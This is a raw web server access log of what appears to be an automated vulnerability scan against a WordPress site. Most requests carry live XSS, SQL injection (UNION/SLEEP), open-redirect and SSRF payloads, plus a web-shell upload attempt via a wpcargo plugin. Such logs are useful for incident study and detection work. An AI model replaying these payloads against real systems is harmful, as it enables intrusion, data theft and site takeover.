2023-10-13 12:50:28 103.153.214.94 GET /wp-admin/admin-ajax.php action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 208
2023-10-13 12:50:53 103.153.214.94 GET / author=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 210
2023-10-13 12:52:20 103.153.214.94 GET /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 209
2023-10-13 12:53:43 103.153.214.94 GET / ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 213
2023-10-13 12:54:19 103.153.214.94 GET /listings/ search_title&location&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 205
2023-10-13 12:56:56 103.153.214.94 GET /community/ foro=signin&redirect_to=https://interact.sh/ 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 205
2023-10-13 12:57:27 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 206
2023-10-13 12:59:36 103.153.214.94 GET /titan-framework/lib/iframe-font-preview.php font-type=google&font-family=%27/onerror=%27alert(document.domain)%27/b=%27 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 210
2023-10-13 12:59:38 103.153.214.94 GET /titan-framework/lib/iframe-font-preview.php font-type=google&font-family=aaaaa&font-weight=%27%20onerror=alert(document.domain)%20b=%27 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 203
2023-10-13 12:59:40 103.153.214.94 GET /titan-framework/lib/iframe-font-preview.php font-type=google&font-family=aaaaa&font-weight=%27%20accesskey=%27x%27%20onclick=%27alert(document.domain)%27%20class=%27 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 203
2023-10-13 13:02:01 103.153.214.94 GET /robots.txt - 443 - 52.167.144.54 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko;+compatible;+bingbot/2.0;++http://www.bing.com/bingbot.htm)+Chrome/103.0.5060.134+Safari/537.36 - 200 0 0 482
2023-10-13 13:05:15 103.153.214.94 GET /wp1/home-18/ qtproxycall=https://oast.me 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 211
2023-10-13 13:06:34 103.153.214.94 GET / cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 212
2023-10-13 13:06:40 103.153.214.94 GET /wp-content/plugins/marmoset-viewer/mviewer.php id=http://</script><svg/onload=alert(%272WfF0hWPam4iM5A422Yg6faX5Ej%27)> 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 205
2023-10-13 13:06:42 103.153.214.94 GET /wp-content/plugins/marmoset-viewer/mviewer.php id=1+http://a.com%27);alert(/2WfF0hWPam4iM5A422Yg6faX5Ej/);marmoset.embed(%27a 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 207
2023-10-13 13:09:29 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 206
2023-10-13 13:09:31 103.153.214.94 GET /wp-content/uploads/workreap-temp/2WfF0pnm1QYRqTG4F0WPRqTyYPo.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 210
2023-10-13 13:11:44 103.153.214.94 GET /index.php rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20- 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 214
2023-10-13 13:11:48 103.153.214.94 POST /wp-json/pie/v1/login - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 216
2023-10-13 13:12:53 103.153.214.94 GET /wp-content/plugins/pie-register/readme.txt - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 208
2023-10-13 13:12:56 103.153.214.94 POST /login/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 207
2023-10-13 13:12:59 103.153.214.94 GET /wp-admin/profile.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 205
2023-10-13 13:14:16 103.153.214.94 GET /wp-json/wp/v2/posts - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 207
2023-10-13 13:16:08 103.153.214.94 GET /wp-admin/admin-ajax.php action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(4)))HQYx) 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 213
2023-10-13 13:16:36 103.153.214.94 GET /forum/ subscribe_topic=1%20union%20select%201%20and%20sleep(6) 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 206
2023-10-13 13:19:30 103.153.214.94 GET /wp-json/anycomment/v1/auth/wordpress redirect=https://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 210
2023-10-13 13:19:33 103.153.214.94 GET /wp-json/anycomment/v1/auth/wordpress redirect=https://interact.sh?a=https://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 205
2023-10-13 13:19:43 103.153.214.94 GET /wp-admin/admin-ajax.php action=tp_tp&e=g&m=s&tl=en&q=<img%20src%3dx%20onerror%3dalert(document.domain)> 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 209
2023-10-13 13:20:36 103.153.214.94 GET /wp-content/plugins/elementor/assets/js/frontend.min.js - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 210
2023-10-13 13:20:39 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 213
2023-10-13 13:24:04 103.153.214.94 GET /wp-admin/options.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 something 200 0 0 206
2023-10-13 13:27:28 103.153.214.94 GET /wp-admin/admin-ajax.php action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 723
2023-10-13 13:28:14 103.153.214.94 GET /wp-admin/admin-ajax.php action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 216
2023-10-13 13:35:16 103.153.214.94 GET /wp-admin/admin-ajax.php action=the_champ_sharing_count&urls[]=<img%20src=x%20onerror=alert(document.domain)> 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 215
2023-10-13 13:36:22 103.153.214.94 GET /wp-json/guppy/v2/load-guppy-users userId=1&offset=0&search 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 220
2023-10-13 13:39:07 103.153.214.94 GET /wp-content/plugins/wpcargo/includes/2WfF0WkrjEEO2fKbDB428CrnOg6.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 214
2023-10-13 13:39:10 103.153.214.94 GET /wp-content/plugins/wpcargo/includes/barcode.php text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=2WfF0WkrjEEO2fKbDB428CrnOg6.php 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 209
2023-10-13 13:39:13 103.153.214.94 POST /wp-content/plugins/wpcargo/includes/2WfF0WkrjEEO2fKbDB428CrnOg6.php 1=var_dump 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 405 0 1 209
2023-10-13 13:39:21 103.153.214.94 GET /wp-admin/admin.php page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 204
2023-10-13 13:39:40 103.153.214.94 GET / noptin_ns=email_click&to=https://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 211
2023-10-13 13:47:25 103.153.214.94 GET /wp-content/plugins/webp-converter-for-media/includes/passthru.php src=https://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 220
2023-10-13 13:50:25 103.153.214.94 GET /wp-admin/admin-ajax.php action=woof_draw_products&woof_redraw_elements[]=<img%20src=x%20onerror=alert(document.domain)> 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 214
2023-10-13 13:51:51 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 222
2023-10-13 13:53:43 103.153.214.94 GET /wp-admin/admin-ajax.php action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 211
2023-10-13 13:55:55 103.153.214.94 GET /wp-json/wp/v2/posts per_page=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 205
2023-10-13 13:56:48 103.153.214.94 GET / rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 233
2023-10-13 13:56:51 103.153.214.94 GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 217
2023-10-13 13:58:46 103.153.214.94 POST /run - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 207
2023-10-13 13:59:09 103.153.214.94 GET /nagiosxi/login.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 207
2023-10-13 13:59:41 103.153.214.94 GET /nagiosxi/login.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 220
2023-10-13 14:00:42 103.153.214.94 GET /nagiosxi/login.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 208
2023-10-13 14:00:50 103.153.214.94 GET /nagiosxi/login.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 210
2023-10-13 14:02:54 103.153.214.94 POST /druid/indexer/v1/sampler - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 219
2023-10-13 14:03:50 103.153.214.94 POST /AurallRECMonitor/services/svc-login.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 209
2023-10-13 14:05:06 103.153.214.94 GET /s/2WfF0olrHIoU9T8o4GOAZtPosCV/_/;/WEB-INF/web.xml - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 214
2023-10-13 14:05:16 103.153.214.94 GET /sitemap.xml - 443 - 52.167.144.203 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko;+compatible;+bingbot/2.0;++http://www.bing.com/bingbot.htm)+Chrome/103.0.5060.134+Safari/537.36 - 200 0 0 490
2023-10-13 14:05:16 103.153.214.94 GET /sitemap.xml - 443 - 52.167.144.203 Mozilla/5.0+AppleWebKit/537.36+(KHTML,+like+Gecko;+compatible;+bingbot/2.0;++http://www.bing.com/bingbot.htm)+Chrome/103.0.5060.134+Safari/537.36 - 200 0 0 308
2023-10-13 14:05:23 103.153.214.94 GET /s/2WfF0XSOH5fh24iCS35aaOCvoTV/_/;/WEB-INF/web.xml - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 206
2023-10-13 14:06:10 103.153.214.94 GET /auth_changepassword.php ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 213
2023-10-13 14:07:09 103.153.214.94 POST /webtools/control/SOAPService - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 215
2023-10-13 14:10:05 103.153.214.94 GET /cgi/cal year=2021%3C/title%3E%3Cscript%3Ealert(%272WfF0hFItVzQyN84szM4RYskLWj%27)%3C/script%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 207
2023-10-13 14:12:38 103.153.214.94 GET /misc.php action=showpopups&type=friend 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 210
2023-10-13 14:13:49 103.153.214.94 GET /cgi/dataset_dictionary dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 207
2023-10-13 14:14:25 103.153.214.94 POST /pages/createpage-entervariables.action SpaceKey=x 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 211
2023-10-13 14:14:27 103.153.214.94 POST /pages/createpage-entervariables.action - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 405 0 1 204
2023-10-13 14:14:29 103.153.214.94 POST /confluence/pages/createpage-entervariables.action SpaceKey=x 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 206
2023-10-13 14:14:31 103.153.214.94 POST /confluence/pages/createpage-entervariables.action - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 210
2023-10-13 14:14:33 103.153.214.94 POST /wiki/pages/createpage-entervariables.action SpaceKey=x 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 210
2023-10-13 14:14:35 103.153.214.94 POST /wiki/pages/createpage-entervariables.action - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 405 0 1 212
2023-10-13 14:14:37 103.153.214.94 POST /pages/doenterpagevariables.action - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 206
2023-10-13 14:14:39 103.153.214.94 POST /pages/createpage.action spaceKey=myproj 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 204
2023-10-13 14:14:41 103.153.214.94 POST /pages/templates2/viewpagetemplate.action - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 405 0 1 212
2023-10-13 14:14:43 103.153.214.94 POST /pages/createpage-entervariables.action - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 210
2023-10-13 14:14:45 103.153.214.94 POST /template/custom/content-editor - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 405 0 1 204
2023-10-13 14:14:47 103.153.214.94 POST /templates/editor-preload-container - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 208
2023-10-13 14:14:49 103.153.214.94 POST /users/user-dark-features - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 207
2023-10-13 14:15:07 103.153.214.94 GET /r2w/signIn.do urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 209
2023-10-13 14:17:02 103.153.214.94 GET /ics tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 208
2023-10-13 14:18:32 103.153.214.94 GET /mod/jitsi/sessionpriv.php avatar=https%3A%2F%2Fbcvt.kontum.gov.vn%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 207
2023-10-13 14:20:24 103.153.214.94 GET /owa/auth/x.js - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 209
2023-10-13 14:20:26 103.153.214.94 POST /patient/search_result.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 205
2023-10-13 14:24:12 103.153.214.94 GET /mods/clansphere/lang_modvalidate.php language=language&module=module%22></script><script>alert(document.domain)</script> 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 216
2023-10-13 14:25:00 103.153.214.94 GET /clansphere/mods/clansphere/lang_modvalidate.php language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 222
2023-10-13 14:26:20 103.153.214.94 POST /admin/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 228
2023-10-13 14:26:36 103.153.214.94 POST /contactus.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 206
2023-10-13 14:26:39 103.153.214.94 POST /contactus.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 405 0 1 205
2023-10-13 14:27:19 103.153.214.94 POST /contactus.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 204
2023-10-13 14:27:44 103.153.214.94 GET /calendar/calendar_form.php/"><script>alert(document.domain)</script> - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 209
2023-10-13 14:27:44 103.153.214.94 POST /contactus.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 214
2023-10-13 14:28:32 103.153.214.94 POST /api/snapshots - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 0 2 215
2023-10-13 14:28:47 103.153.214.94 GET /index.php SQ=0&srch=x"+onmouseover%3Dalert%281%29+x%3D"&t=search&btn_submit.x=0&btn_submit.y=0 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 216
